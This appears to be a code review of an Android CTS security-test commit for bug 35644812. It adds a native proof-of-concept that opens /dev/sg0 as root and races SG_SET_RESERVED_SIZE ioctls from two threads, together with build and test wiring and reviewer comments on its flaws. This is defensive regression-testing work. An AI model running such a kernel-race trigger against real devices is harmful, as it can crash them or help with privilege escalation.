CTS/STS test for Android Security b/35644812
Bug: 35644812
Change-Id: I1f19c1e66c665f06ac54d6333e19ebf2f00abbb1
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f208b96..3792861 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -118,6 +118,7 @@
<option name="push" value="Bug-33039685->/data/local/tmp/Bug-33039685" />
<option name="push" value="Bug-35676417->/data/local/tmp/Bug-35676417" />
+ <option name="push" value="Bug-35644812->/data/local/tmp/Bug-35644812" />
<option name="append-bitness" value="true" />
</target_preparer>
diff --git a/hostsidetests/security/securityPatch/Bug-35644812/Android.mk b/hostsidetests/security/securityPatch/Bug-35644812/Android.mk
new file mode 100644
index 0000000..e02559d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644812/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35644812
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
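Review bot: The four `CFLAGS +=` lines and `LDFLAGS += -rdynamic` assign to plain `CFLAGS`/`LDFLAGS`, which the Android make build does not apply to a module; only `LOCAL_`-prefixed variables, such as the `LOCAL_LDFLAGS` line just below them, are reset by `CLEAR_VARS` and consumed by `BUILD_CTS_EXECUTABLE`. As written, `-Wall`, `-Wshadow` and `-D_FORTIFY_SOURCE=2` most likely never reach poc.c, and the assignments leak into the global make namespace. I would write them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...` and either drop `-rdynamic` or move it to `LOCAL_LDFLAGS`. With the warnings actually enabled, poc.c in this same commit would report the shadowed `i` in in_cpu() and the unused `ret` in overwrite().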
diff --git a/hostsidetests/security/securityPatch/Bug-35644812/poc.c b/hostsidetests/security/securityPatch/Bug-35644812/poc.c
new file mode 100644
index 0000000..c0ca91f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644812/poc.c
@@ -0,0 +1,106 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+
+#include <string.h>
+
+#include <android/log.h>
+#include <dirent.h>
+#include <dlfcn.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/futex.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/ptrace.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/system_properties.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/un.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+int fd;
+
+void in_cpu() {
+ int num_processors = sysconf(_SC_NPROCESSORS_CONF);
+ cpu_set_t get;
+ int i = 0;
+ CPU_ZERO(&get);
+ sched_getaffinity(0, sizeof(cpu_set_t), &get);
+ for (int i = 0; i < num_processors; i++) {
+ if (CPU_ISSET(i, &get)) {
+ printf("The current thread bound to core %d\n", i);
+ }
+ }
+}
+static void bind_child_to_cpu() {
+ in_cpu();
+ cpu_set_t set;
+ CPU_ZERO(&set);
+ CPU_SET(1, &set);
+ sched_setaffinity(0, sizeof(set), &set);
+ in_cpu();
+}
+
+#define BLKTRACETEARDOWN _IO(0x12, 118)
+#define SG_SET_RESERVED_SIZE 0x2275
+#define SG_GET_RESERVED_SIZE 0x2272
+static void* overwrite(void* param) {
+ int ret;
+ for (int i = 0; i < 100000; i++) {
+ int size = 0x100;
+ int n = ioctl(fd, SG_SET_RESERVED_SIZE, &size);
+ printf("ioctl error =%d %s\n", n, strerror(errno));
+ }
+ return param;
+}
+
+int functionOne() {
+ sleep(2);
+ char filename[128];
+ strcpy(filename, "/dev/sg0");
+
+ fd = open(filename, 2);
+ if (fd == -1) {
+ return -1;
+ }
+
+ pthread_t thread0;
+ for (int i = 0; i < 2; i++) {
+ if (pthread_create(&thread0, NULL, overwrite, NULL))
+ perror("overwritethread pthread_create()");
+ }
+
+ return 0;
+}
+
+int main(int argc, char** argv, char** env) { return functionOne(); }
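Review bot: functionOne() returns right after pthread_create(), and main() returns that result, so the process exits and both overwrite() threads are torn down before their 100000-iteration ioctl loops have run. The test can therefore report a pass on a device that still carries the bug. Both threads are also stored in the single `thread0`, so neither can be joined as written; keep both handles and join them before returning, as below. Separately, overwrite() prints strerror(errno) on every iteration even when ioctl() succeeded, so the message then shows a stale errno. in_cpu(), bind_child_to_cpu(), BLKTRACETEARDOWN and SG_GET_RESERVED_SIZE are never used, and `open(filename, 2)` would read better as `open("/dev/sg0", O_RDWR)`.

```c
int functionOne() {
  // … unchanged: sleep, open of /dev/sg0 and fd check …
  pthread_t threads[2];
  int started = 0;
  for (int i = 0; i < 2; i++) {
    if (pthread_create(&threads[started], NULL, overwrite, NULL))
      perror("overwritethread pthread_create()");
    else
      started++;
  }
  /* Wait for the workers; returning from main() would end them early. */
  for (int i = 0; i < started; i++)
    pthread_join(threads[i], NULL);
  close(fd);
  return 0;
}
```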
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_09.java b/hostsidetests/security/src/android/security/cts/Poc17_09.java
index 051c589..fbda89c 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_09.java
@@ -42,4 +42,15 @@
AdbUtils.runPocNoOutput("Bug-35676417", getDevice(), 60);
}
}
+
+ /**
+ * b/35644812
+ */
+ @SecurityTest
+ public void testPocBug_35644812() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/sg0")) {
+ AdbUtils.runPocNoOutput("Bug-35644812", getDevice(), 60);
+ }
+ }
}
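Review bot: testPocBug_35644812() contains no assertion, so the hunk does not show what makes this test fail on an affected device. Presumably a device crash surfaces as an exception from `AdbUtils.runPocNoOutput`, but that helper is outside this hunk and should be confirmed. The test also passes silently when `/dev/sg0` is absent, and the Javadoc is only the bug number. I would expand it to something like `/** b/35644812: runs the Bug-35644812 native binary as root when /dev/sg0 exists; skipped (passes) on devices without that node. */` and add one sentence stating the failure condition. The enclosing class starts outside the hunk.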